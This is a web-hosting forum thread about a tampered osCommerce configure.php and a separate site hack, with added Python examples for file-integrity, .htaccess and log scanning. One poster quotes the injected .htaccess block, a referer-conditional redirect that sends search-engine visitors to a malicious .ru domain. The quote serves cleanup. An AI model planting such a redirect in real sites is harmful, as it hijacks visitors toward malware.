osCommerce

The e-commerce.

Weird configure.php "hack"


pvandebe


I detected this morning something weird.

The configure.php file in catalog/includes (security 444) had been set to .old and a new configure.php has been created. The only difference I see is that my http reference www.<site>.be has been modified to my fixed IP address.

I have set all security correct (I guess) and added all hack add-ons.

Anyone any idea? The only one I can think of is my provider...


I recently purchased McAfee, did a whole check...

As far as I know, malware tries to work without you noticing it in the files themselves. It was rapidly reported by site monitor. Using the .old thing looks like a developer's work.

I remember my SP returning me a new password last time. I changed it today.


Malware on your computer so that the hacker has the credentials of your FTP access perhaps?

 

I have been recently hacked with the wizrdenterteiment.ru redirect via .htaccess. Have followed all of your posts to remove malware and secure my site.

Still have some problems, a script is changing the permissions of configure.php from 444 to 777?

For now put in a cron job to keep changing to 444 till I find the problem code.

Any ideas how to find it? Removed all base64 and there were many.

Thanks,

Rich
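An added example (not from any poster here and not osCommerce code) of the check that Rich's cron job only approximates: record a baseline of configure.php once, then report a changed hash, a mode other than 444, a timestamp older than the baseline, or a stray configure.php.old beside it. The file content, the paths and the 203.0.113.10 address in the demo are constructed.

```python
import hashlib, json, os, stat, tempfile
from pathlib import Path

EXPECTED_MODE = 0o444                       # the read-only mode the posts keep configure.php at
STRAY_SUFFIXES = (".old", ".OLD", ".bak")   # leftover copies of the file worth flagging

def _digest(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def record_baseline(path, baseline_path):
    """Store hash, mode and mtime of a reviewed, known-good file (run once)."""
    st = os.stat(path)
    data = {"sha256": _digest(path), "mode": stat.S_IMODE(st.st_mode), "mtime": st.st_mtime}
    Path(baseline_path).write_text(json.dumps(data))
    return data

def verify_file(path, baseline_path):
    """Return a list of findings; an empty list means the file matches its baseline."""
    if not os.path.exists(path):
        return [f"missing: {path}"]
    base = json.loads(Path(baseline_path).read_text())
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if _digest(path) != base["sha256"]:
        findings.append("content changed")
        if st.st_mtime < base["mtime"]:   # new content but an older timestamp: backdated
            findings.append("mtime older than baseline: timestamp may be backdated")
    if mode != EXPECTED_MODE:
        findings.append(f"mode is {oct(mode)}, expected {oct(EXPECTED_MODE)}")
    for suffix in STRAY_SUFFIXES:
        if os.path.exists(path + suffix):
            findings.append(f"stray copy present: {path + suffix}")
    return findings

def demo():
    """Constructed scenario: a clean file, then the rename-and-replace described above."""
    d = tempfile.mkdtemp()
    cfg, baseline = os.path.join(d, "configure.php"), os.path.join(d, "configure.baseline")
    Path(cfg).write_text("<?php define('HTTP_SERVER', 'http://www.example-shop.be');\n")
    os.chmod(cfg, EXPECTED_MODE)
    record_baseline(cfg, baseline)
    clean = verify_file(cfg, baseline)
    # tamper: leave a .old copy, rewrite the host to a bare IP, loosen the mode to 777
    os.rename(cfg, cfg + ".old")
    Path(cfg).write_text("<?php define('HTTP_SERVER', 'http://203.0.113.10');\n")
    os.chmod(cfg, 0o777)
    return clean, verify_file(cfg, baseline)
```

Run verify_file from cron against a baseline stored outside the web root; a non-empty result is the moment to pull the server logs, rather than silently resetting the mode.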


No idea how to find out (except going through logs that you probably don't have access to), but maybe this page gives some more hints on what you could do?

Thanks, that did help a bit. I found in languages/english a violated script cookies_usage.php. Not sure what it is trying to do, but sure it is not good.

Here is what the hackers added to the .htaccess file in the initial hack. FYI, easy to remove, but not the end of the story for me.


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://wizrdenterteiment.ru/product/index.php [R=301,L]
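An added example (not from the post and not osCommerce code) that scans an .htaccess for exactly this pattern: a chain of RewriteCond lines testing HTTP_REFERER followed by a RewriteRule whose target is a host other than the site's own. The shortened sample block, the second harmless rule and the www.example-shop.be host are assumptions.

```python
from urllib.parse import urlparse

# Constructed sample: the referer-conditional redirect quoted in the post, cut down to three
# conditions, followed by an ordinary front-controller rule that must not be flagged.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.*
RewriteRule ^(.*)$ http://wizrdenterteiment.ru/product/index.php [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [L]
"""

# Hosts the shop may legitimately redirect to (assumed value; set to the site's own names).
OWN_HOSTS = {"www.example-shop.be"}

def find_referer_redirects(text, own_hosts=OWN_HOSTS):
    """Return (line_no, target_host, referer_patterns) for every RewriteRule whose
    condition chain tests HTTP_REFERER and whose target points at an external host."""
    findings = []
    conds = []          # referer patterns collected for the chain in progress
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("RewriteCond"):
            parts = line.split()
            if len(parts) >= 3 and parts[1] == "%{HTTP_REFERER}":
                conds.append(parts[2])
            continue
        if line.startswith("RewriteRule"):
            parts = line.split()
            target = parts[2] if len(parts) >= 3 else ""
            host = urlparse(target).netloc.lower()   # empty for relative targets
            if conds and host and host not in own_hosts:
                findings.append((n, host, list(conds)))
            conds = []                               # a RewriteRule ends the chain
    return findings

if __name__ == "__main__":
    for line_no, host, patterns in find_referer_redirects(SAMPLE_HTACCESS):
        print(f"line {line_no}: redirect to {host} when referer matches {patterns}")
```

Run it over every .htaccess under the web root (hosts often drop them in images/ or includes/ too), since a rule that only fires for search-engine referers is invisible when you browse the shop directly.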


Coming back to the original problem:

Site monitor results:

TIME MISMATCH:

Time Mismatch on includes/configure.php Last Changed on Saturday, 11 Sep 2010 08:47:20 GMT

Now the raw access log:

Around 06:47 I find nothing (not sure how it works with the GMT, so I post various hours):

around 07:47

66.249.66.163 - - [11/Sep/2010:07:47:07 +0200] "GET /ecom/catalog/product_info.php?products_id=1350836&language=en HTTP/1.1" 200 30910 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

193.191.206.94 - - [11/Sep/2010:07:47:37 +0200] "GET /ecom/catalog/stylesheet.css HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"

66.249.66.163 - - [11/Sep/2010:07:49:47 +0200] "GET /ecom/catalog/index.php?manufacturers_id=63Blackspire&sort=2a&filter_id=188&language=en&action=notify&products_id=1332430 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

216.104.15.138 - - [11/Sep/2010:07:50:29 +0200] "GET /ecom/catalog/product_info.php?manufacturers_id=10&products_id=1320344&language=en HTTP/1.0" 200 35755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

66.249.66.163 - - [11/Sep/2010:07:50:50 +0200] "GET /ecom/catalog/index.php?manufacturers_id=63Blackspire&page=1&sort=3d&action=notify&products_id=1332302 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

around 08:47

66.249.66.163 - - [11/Sep/2010:08:47:24 +0200] "GET /ecom/catalog/index.php?manufacturers_id=52&sort=2a&filter_id=291&language=en HTTP/1.1" 200 30586 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:08:47:24 +0200] "GET /ecom/catalog/index.php?manufacturers_id=52Syncros&list=normal&page=1&sort=2d&action=notify&products_id=1351559 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:08:48:27 +0200] "GET /ecom/catalog/index.php?manufacturers_id=44Schwalbe&filter_id=179&page=1&sort=3a HTTP/1.1" 200 74994 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:08:48

around 09:47

66.249.66.163 - - [11/Sep/2010:09:46:53 +0200] "GET /ecom/catalog/index.php?manufacturers_id=63Blackspire&filter_id=83&page=1&sort=2a&exclnos=N HTTP/1.1" 200 30518 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:09:47:55 +0200] "GET /ecom/catalog/index.php?manufacturers_id=12Ritchey&sort=1a&list=normal&exclnos=N HTTP/1.1" 200 75399 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:09:47:57 +0200] "GET /ecom/catalog/index.php?manufacturers_id=38&filter_id=272&page=1&sort=1d HTTP/1.1" 200 30385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.163 - - [11/Sep/2010:09:48:04 +0200] "GET /ecom/catalog/index.php?manufacturers_id=70&sort=7a&filter_id=65 HTTP/1.1" 200 34597 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

around 10:47

66.249.66.78 - - [11/Sep/2010:10:47:02 +0200] "GET /ecom/catalog/index.php?manufacturers_id=13SRAM&language=NL HTTP/1.1" 200 32608 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.66.78 - - [11/Sep/2010:10:47:30 +0200] "GET /ecom/catalog/product_info.php?products_id=1338495&language=en HTTP/1.1" 200 36484 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

So nothing specific around the reported time.

Search for configure.php or configure.php.OLD: NOTHING

So I conclude it has been done from the "inside". Any idea how I can check "actions" executed on cPanel?
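An added example (not the poster's own analysis) of the check this log hunt needs: a file edited through a dropped script shows up as a request to a PHP file the stock shop never serves directly, not as a request for configure.php, so grepping for the edited file's name finds nothing. Two sample lines are shaped like the Googlebot lines above; the two from 198.51.100.7, the name unknown.php and the KNOWN_SCRIPTS subset are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Apache combined log format, as in the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Scripts a stock osCommerce catalog serves directly (assumed subset; extend for add-ons).
KNOWN_SCRIPTS = {"index.php", "product_info.php", "shopping_cart.php", "checkout_shipping.php",
                 "login.php", "create_account.php", "account.php", "advanced_search_result.php"}

# Constructed sample: two benign lines plus two made-up suspicious ones from a documentation address.
SAMPLE_LOG = """\
66.249.66.163 - - [11/Sep/2010:07:47:07 +0200] "GET /ecom/catalog/product_info.php?products_id=1350836&language=en HTTP/1.1" 200 30910 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.191.206.94 - - [11/Sep/2010:07:47:37 +0200] "GET /ecom/catalog/stylesheet.css HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
198.51.100.7 - - [11/Sep/2010:08:46:58 +0200] "POST /ecom/catalog/images/unknown.php HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [11/Sep/2010:08:47:15 +0200] "GET /ecom/catalog/includes/configure.php.old HTTP/1.1" 200 2210 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""

def suspicious_requests(log_text, webroot="/ecom/catalog/"):
    """Return (ip, time, method, path, reasons) for requests a file-modification hunt should review."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line; skip rather than guess
        path = urlparse(m["url"]).path
        name = path.rsplit("/", 1)[-1]
        rel = path[len(webroot):] if path.startswith(webroot) else path
        reasons = []
        if m["method"] == "POST" and name.endswith(".php") and name not in KNOWN_SCRIPTS:
            reasons.append("POST to a script outside the stock set")
        if ".php" in name and name not in KNOWN_SCRIPTS and "/" in rel:
            reasons.append("script requested from a sub-folder (images/, includes/, languages/ ...)")
        if name.startswith("configure.php"):
            reasons.append("direct request for configure.php or a copy of it")
        if reasons:
            hits.append((m["ip"], m["time"], m["method"], path, "; ".join(reasons)))
    return hits
```

The time window to inspect is the minutes before the monitor's timestamp, and the requests that matter are the unfamiliar script names, not the edited file; any add-on the shop installs has to be added to the stock list first.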


The configure.php file in catalog/includes (security 444) had been set to .old and a new configure.php has been created. The only difference I see is that my http reference www.<site>.be has been modified to my fixed IP address.

First post in this forum, so I may be way off, but from what I've seen, a hack would not create a .old file. It would simply insert/change the code so that you wouldn't notice it. This may be a silly suggestion, but have you checked with your SP? Any chance there's some automation, cron job or add-on (by you or your SP) performing this change?

(No idea about the cPanel log, I'm also looking forward to an answer to this)


Generally, if something is changing a file over and over, I would suggest you look for shell scripts.

I have seen these shell scripts replace a file, leave no FTP or other regular fingerprints and give the file an older date (i.e. 04/08/2008) five minutes after I removed some malware code.

Shell scripts are best looked for via grep on the entire server and especially on the entire domain.

cheers

Peter McGrath

-----------------------------

See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation


Just for the record:

It was indeed my SERVICE PROVIDER. He never told me, but the day after I changed my general password, I got an email from them that they did work on my SSL implementation (which I asked for several months before) but couldn't get it to work >_<

They finally did install their own SSL... it cost me a lot again, but I was happy to have SSL at last.

And about SSL and getting more "create accounts": I don't see any difference. My guess is SSL is just big sales. Big money.
